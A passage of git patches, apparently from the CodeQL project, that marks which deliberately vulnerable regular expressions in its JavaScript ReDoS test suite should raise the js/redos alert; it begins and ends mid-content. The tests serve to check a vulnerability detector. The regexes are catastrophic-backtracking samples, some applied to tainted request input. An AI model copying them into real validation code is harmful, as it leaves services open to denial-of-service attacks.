/((decltype\(auto\)|([a-zA-Z_]\w*::)?[a-zA-Z_]\w*(<[^<>]+>)?)[\*&\s]+)+([a-zA-Z_]\w*::)?[a-zA-Z]\w*\s*\(/m; // jboss-cli -var bad = /\B(([\/.])[\w\-.\/=]+)+X/; +var bad = /\B(([\/.])[\w\-.\/=]+)+X/; // $ Alert[js/redos] var good = /\B([\/.])[\w\-.\/=]+X/; // r -var bad = /`(?:\\.|[^`])+`/m; +var bad = /`(?:\\.|[^`])+`/m; // $ Alert[js/redos] var good = /`(?:\\.|[^`\\])+`/; // erlang-repl -var bad = /\?(::)?([A-Z]\w*(::)?)+X/; +var bad = /\?(::)?([A-Z]\w*(::)?)+X/; // $ Alert[js/redos] var good = /\?(::)?([A-Z]\w*)((::)[A-Z]\w*)*X/; // javascript -var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; +var bad = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\))*[^()]*\))*[^()]*\)\s*\{/m; // $ Alert[js/redos] var good = /[a-zA-Z_]\w*\([^()]*(\([^()]*(\([^()]*\)[^()]*)*\)[^()]*)*\)\s*\{/m; From d298d8740f8fdc93b237843a4fd877cb7c191f37 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:29:38 +0100 Subject: [PATCH 083/892] JS: Accept some exponenital redos alerts in the polynomial redos test suite --- .../query-tests/Security/CWE-400/ReDoS/polynomial-redos.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js index 30b64fd37a8c..95e58d2f060c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js @@ -14,7 +14,7 @@ app.use(function(req, res) { tainted.replace(/^.*\./, ''); tainted.replace(/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/); // $ Alert[js/polynomial-redos] tainted.replace(/^(`+)([\s\S]*?[^`])\1(?!`)/); // $ Alert[js/polynomial-redos] - /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] + /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] Alert[js/redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]+|[\u0600-\u06FF\/]+(\s*?[\u0600-\u06FF]+){1,2}/i); // $ Alert[js/polynomial-redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]{1,256}|[\u0600-\u06FF\/]{1,256}(\s*?[\u0600-\u06FF]{1,256}){1,2}/i); // $ Alert[js/polynomial-redos] - even though it is a proposed fix for the above tainted.match(/^(\+|-)?(\d+|(\d*\.\d*))?(E|e)?([-+])?(\d+)?$/); // $ Alert[js/polynomial-redos] @@ -38,12 +38,12 @@ app.use(function(req, res) { tainted.match(/<.*href="([^"]+)".*>/); // $ Alert[js/polynomial-redos] tainted.match(/^([^-]+)-([A-Za-z0-9+/]+(?:=?=?))([?\x21-\x7E]*)$/); // $ Alert[js/polynomial-redos] - tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert - it is a fix for the above, but it introduces exponential complexity elsewhere + tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert[js/redos] - it is a fix for the above, but it introduces exponential complexity elsewhere tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([\n \t]+([^\n]+))?$/); // $ Alert[js/polynomial-redos] tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([ \t]+([^ \t][^\n]*[\n]*)?)?$/); - tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert - also flagged by js/redos + tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert[js/redos] - also flagged by js/redos tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)(?:\.[a-zA-Z_][a-zA-Z_0-9]*)*$/); tainted.replaceAll(/\s*\n\s*/g, ' '); // $ Alert[js/polynomial-redos] From 51fb3dad74da0f851d2dd3c2034723bbb58cb23d Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:31:10 +0100 Subject: [PATCH 084/892] JS: Accept ReDoS alerts in regexplib --- .../CWE-400/ReDoS/regexplib/address.js | 4 ++-- .../Security/CWE-400/ReDoS/regexplib/dates.js | 2 +- .../Security/CWE-400/ReDoS/regexplib/email.js | 16 +++++++-------- .../CWE-400/ReDoS/regexplib/markup.js | 20 +++++++++---------- .../Security/CWE-400/ReDoS/regexplib/misc.js | 18 ++++++++--------- .../CWE-400/ReDoS/regexplib/strings.js | 12 +++++------ .../Security/CWE-400/ReDoS/regexplib/uri.js | 12 +++++------ 7 files changed, 42 insertions(+), 42 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js index ba005a21fdef..d22023d27dd0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js @@ -48,7 +48,7 @@ /^(\d{2}-\d{2})*$/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; +/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /(^0.*[1-9]*)|(^860+)|(^8613)|(\D)|([0-9])/g; /(077|078|079)\s?\d{2}\s?\d{6}/g; @@ -72,7 +72,7 @@ /^(\d{2}-\d{2})*$/g; /^(?:\([2-9]\d{2}\)\ ?|(?:[2-9]\d{2}\-))[2-9]\d{2}\-\d{4}$/g; /^[1-9]{1}[0-9]{3}\s?[A-Z]{2}$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; +/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js index 39d1669109e4..14468a515657 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js @@ -24,7 +24,7 @@ /((\d{2})|(\d))\/((\d{2})|(\d))\/((\d{4})|(\d{2}))/g; /^((0[1-9])|(1[0-2]))$/g; /^(\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)$/g; -/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; +/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; // $ Alert[js/redos] /^((31(?! (FEB|APR|JUN|SEP|NOV)))|((30|29)(?! FEB))|(29(?= FEB (((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00)))))|(0?[1-9])|1\d|2[0-8])-(JAN|FEB|MAR|MAY|APR|JUL|JUN|AUG|OCT|SEP|NOV|DEC)-((1[6-9]|[2-9]\d)\d{2})$/g; /^[0-9]{4}-(((0[13578]|(10|12))-(0[1-9]|[1-2][0-9]|3[0-1]))|(02-(0[1-9]|[1-2][0-9]))|((0[469]|11)-(0[1-9]|[1-2][0-9]|30)))$/g; /^([0]?[1-9]|[1][0-2])[./-]([0]?[1-9]|[1|2][0-9]|[3][0|1])[./-]([0-9]{4}|[0-9]{2})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js index a68c66d2fea8..f7ab34777169 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js @@ -1,16 +1,16 @@ -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] /(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})/g; /^((?>[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+\x20*|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*"\x20*)*(?<))?((?!\.)(?>\.?[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+)+|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*")@(((?!-)[a-zA-Z\d\-]+(?)$/g; /^\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,3}$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; -/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] +/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; // $ Alert[js/redos] /^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*\.(([0-9]{1,3})|([a-zA-Z]{2,3})|(aero|coop|info|museum|name))$/g; /(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\"))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\")))*)@(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\]))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\])))*)/g; /^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}$/g; /^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$/g; /^(([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+([;.](([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+)*$/g; /\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*([,;]\s*\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*)*/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; +/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; // $ Alert[js/redos] /^([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/g; /^\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$/g; /^[\w-]+(?:\.[\w-]+)*@(?:[\w-]+\.)+[a-zA-Z]{2,7}$/g; @@ -22,16 +22,16 @@ /^\W{0,5}[Rr]e:\W[a-zA-Z0-9]{1,10},\W[a-z]{1,10}\W[a-z]{1,10}\W[a-z]{1,10}/g; /^([\w\d\-\.]+)@{1}(([\w\d\-]{1,67})|([\w\d\-]+\.[\w\d\-]{1,67}))\.(([a-zA-Z\d]{2,4})(\.[a-zA-Z\d]{2})?)$/g; /^([\w\-\.]+)@((\[([0-9]{1,3}\.){3}[0-9]{1,3}\])|(([\w\-]+\.)+)([a-zA-Z]{2,4}))$/g; -/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; +/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; // $ Alert[js/redos] /^[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9]@[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9][\.][a-z0-9]{2,4}$/g; /(?(?![ ])(\w|[.])*@(\w|[.])*)/g; /\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$|^([0-9a-zA-Z'\.]{3,40})\*|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\.([0-9a-zA-Z']+)$|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\*+$|^$/g; /[\w-]+@([\w-]+\.)+[\w-]+/g; /^(?:[a-zA-Z0-9_'^&/+-])+(?:\.(?:[a-zA-Z0-9_'^&/+-])+)*@(?:(?:\[?(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\.){3}(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\]?)|(?:[a-zA-Z0-9-]+\.)+(?:[a-zA-Z]){2,}\.?)$/g; /^((?[a-z]:)|(\\\\(?[0-9]*[a-z\-][a-z0-9\-]*)\\(?[^\.\x01-\x1F\\""\*\?<>:|\\/][^\x01-\x1F\\""\*\?|><:\\/]*)))?(?(?(\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))?(?[\\/](\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))*)?[\\/]?$/g; -/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; +/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; // $ Alert[js/redos] +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] /^[\w-]+(\.[\w-]+)*@([a-z0-9-]+(\.[a-z0-9-]+)*?\.[a-z]{2,6}|(\d{1,3}\.){3}\d{1,3})(:\d{4})?$/g; /^[\w\.=-]+@[\w\.-]+\.[\w]{2,3}$/g; /^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js index 31edb6c76ddc..db5d45df0f74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js @@ -1,27 +1,27 @@ /<[^>]*\n?.*=("|')?(.*\.jpg)("|')?.*\n?[^<]*>/g; /<[^>]*>/g; -/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; +/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; // $ Alert[js/redos] /\xA9/g; /(?'DateLiteral' (?# Per the VB Spec : DateLiteral ::= '#' [ Whitespace+ ] DateOrTime [ Whitespace+ ] '#' ) \#\s* (?'DateOrTime' (?# DateOrTime ::= DateValue Whitespace+ TimeValue | DateValue | TimeValue ) (?'DateValue' (?# DateValue ::= Whitespace+ TimeValue | DateValue | TimeValue ) ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Day 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{1,4}) \s+ (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? ) | ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Month 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{4}) ) | ( (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? ) ) ) \s*\# )/g; /(SELECT\s[\w\*\)\(\,\s]+\sFROM\s[\w]+)| (UPDATE\s[\w]+\sSET\s[\w\,\'\=]+)| 